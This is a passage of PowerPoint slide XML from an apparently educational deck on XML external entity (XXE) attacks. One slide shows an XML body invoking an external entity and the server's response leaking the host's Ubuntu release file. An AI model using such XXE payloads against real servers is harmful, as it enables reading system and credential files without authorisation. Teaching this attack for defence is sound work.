                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>      &amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>bar;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>foo&gt; </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>HTTP/1.0 200 OK </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>DISTRIB_ID=Ubuntu </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>xenial</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS" </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>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78628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888</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XXE ATTACK</vt:lpstr>
      <vt:lpstr>What is XXE?</vt:lpstr>
      <vt:lpstr>ABOUT XML</vt:lpstr>
      <vt:lpstr>EXAMPLE 1</vt:lpstr>
      <vt:lpstr>More thing about XML</vt:lpstr>
      <vt:lpstr>Example 2</vt:lpstr>
      <vt:lpstr>Example 3</vt:lpstr>
      <vt:lpstr>More than DDOS</vt:lpstr>
      <vt:lpstr>Example 4</vt:lpstr>
      <vt:lpstr>Example 5</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>For any query: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XXE ATTACK</dc:title>
  <dc:creator>dell</dc:creator>
  <cp:lastModifiedBy>dell</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-10T12:37:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-13T07:15:18Z</dcterms:modified>
</cp:coreProperties>
</file>